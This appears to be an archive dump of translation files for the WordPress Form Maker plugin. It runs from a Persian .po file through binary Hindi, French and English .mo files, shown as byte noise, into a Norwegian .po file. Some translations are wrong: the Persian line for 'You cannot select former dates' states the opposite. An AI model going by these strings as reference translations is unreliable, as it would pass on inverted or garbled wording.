#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "خطا، ایمیل فرستاده نشد."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "آدرس پست الکترونیک شما در حال حاضر تأیید شده است."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "پست الکترونیک شما با موفقیت تایید شده است."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "تایید پست الکترونیک شما به پایان رسیده است."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "پیوند تأیید نامعتبر است."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "فیلد الزامی است."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "این یک آدرس ایمیل معتبر نیست."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"شما می توانید تاریخ های سابق را انتخاب کنید. تاریخ شروع از یک جریان را "
"انتخاب کنید."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "ارزش باید بین است "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "مقدار"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "امتیاز شما باید کمتر از است "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "عنوان"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "نخستین"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "واپسین"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "متوسط"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "کد منطقه"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "شماره تلفن"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "دلار "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "سنت "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "از"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "به"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "به "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "تنظیم مجدد "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "انتخاب درست "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "انتخاب تاریخ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-hi_IN.mo000060400000012473152434416630012170 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
U
o

	�
	�
�

�
L�
{>��.�
%6
GRct{U���
2 
S
g
1x
;�
�
��
<��+�!X%�~Ik��?��a�uTn�s9��b^:�>�4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:56+0400
PO-Revision-Date: 2015-05-22 16:56+0400
Last-Translator: 
Language-Team: 
Language: hi
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
अप्रैल एरिया कोडअगस्तसेंट्स शहरदेशदिसंबर  डॉलर त्रुटि, ईमेल नहीं भेजा गया था.त्रुटि, फ़ाइल स्थानांतरित नहीं किया जा सकता है.त्रुटि, गलत सुरक्षा कोड.फरवरी प्रथम || प्रारंभिकसे जाओ जनवरी जुलाई जून अंतिम मार्च मईमध्यकुछ भी नहीं प्रस्तुत किया गया था.नवंबर अक्टूबर फ़ोन नंबरपोस्टल या ज़िप कोड -मात्रा रीसेट एक तिथि का चयन करेंएक क्षेत्र का चयन करें सितंबर क्षमा करें, आप इस प्रकार की फ़ाइल अपलोड करने की अनुमति नहीं है.राज्य / प्रांत क्षेत्र /सड़क का पता सड़क पता पंक्ति 2Theफ़ाइल का आकार की अनुमति दी से अधिकइस क्षेत्र %s एक अद्वितीय प्रविष्टि की आवश्यकता है और इस मूल्य पहले से ही प्रस्तुत किया गया.यह एक मान्य ईमेल पता नहीं है.शीर्षक तकसत्यापन लिंक अमान्य है।आप पूर्व तारीखों का चयन नहीं कर सकते हैं। वर्तमान एक से शुरू करने के लिए एक तिथि चुनें।आपका ईमेल पता पहले से ही सत्यापित है।आपका ईमेल सफलतापूर्वक सत्यापित किया गया है।आपका ईमेल सत्यापन का समय समाप्त हो गया है।अपने प्रपत्र सफलतापूर्वक सबमिट किया गया था.आपका आईपी काली सूची में डाला है. वेबसाइट व्यवस्थापक से संपर्क करें. अपने स्कोर की तुलना में कम होना चाहिए फ़ील्ड की आवश्यकता है.मूल्य के बीच होना चाहिए languages/form_maker-fr_FR.mo000060400000007340152434416630012175 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
G
T
Z
a
g
	l
v
%
/�
(�
�

$,49=BFNenv�
�	���	�I�0	9	CM,QP~(���#
Z%
+�
,�
*�
-O2%��!�4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:55+0400
PO-Revision-Date: 2015-05-22 16:55+0400
Last-Translator: 
Language-Team: 
Language: fr
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
AvrilCode de zoneaoûtCents VillePaysDécembreDollars Erreur, e-mail n'a pas été envoyé.Erreur, le fichier ne peut pas être déplacé.Erreur, le code de sécurité incorrect.févrierPrénomà partir de aller JanvierJuilletjuinNommarsMaiMoyenneRien n'a été soumis.novembreoctobreN° téléphoneCode postal / ZipQuantité remettre Sélectionnez une dateSélectionnez un champ SeptembreDésolé, vous n'êtes pas autorisé à télécharger ce type de fichier.ProvinceAdresse 1Adresse 2la Le fichier dépasse la taille autorisée desCe champ %s nécessite une entrée unique et cette valeur a déjà été soumis.Ceci n'est pas une adresse e-mail valideTitreàLien de vérification est invalide.Vous ne pouvez pas sélectionner anciens dates. Choisissez une date à partir de l'actuel.Votre adresse e-mail est déjà vérifiée.Votre email a été vérifiée avec succès.Votre courriel de vérification a expiré.Votre formulaire a été soumis avec succès.Votre ip est blacklisté. S'il vous plaît contactez l'administrateur du site. Votre note doit être inférieure à Champ est obligatoirevaleur doit être comprise entre languages/form_maker-en_US.mo000060400000007245152434416630012214 0ustar00��6�I|��	���������'<\ekps{������������
��	7Pjy�$�K�"'-0LN'�*�&�%A;}�����
	�
�
�
�
�
�
�
�
�
'�
<EKPS[`ejpt{������
��	�7�0JYo$sK�"�



L.
'{
*�
&�
%�
A]|�64&-'#!32	,*
/5%.1 )+$0
"(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, file destination does not exist.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:53+0400
PO-Revision-Date: 2015-05-22 16:53+0400
Last-Translator: 
Language-Team: 
Language: el
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, file destination does not exist.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenlanguages/form_maker-nb_NO.po000060400000056573152434416630012211 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:01+0400\n"
"PO-Revision-Date: 2015-05-22 17:02+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: nb\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Gateadresse"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Gateadresse Linje 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "By"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Stat / provins / region"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Postal / postnummer"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Land"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Januar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Februar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Mars"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "April"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Mai"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Juni"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Juli"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "August"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "September"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Oktober"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "November"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
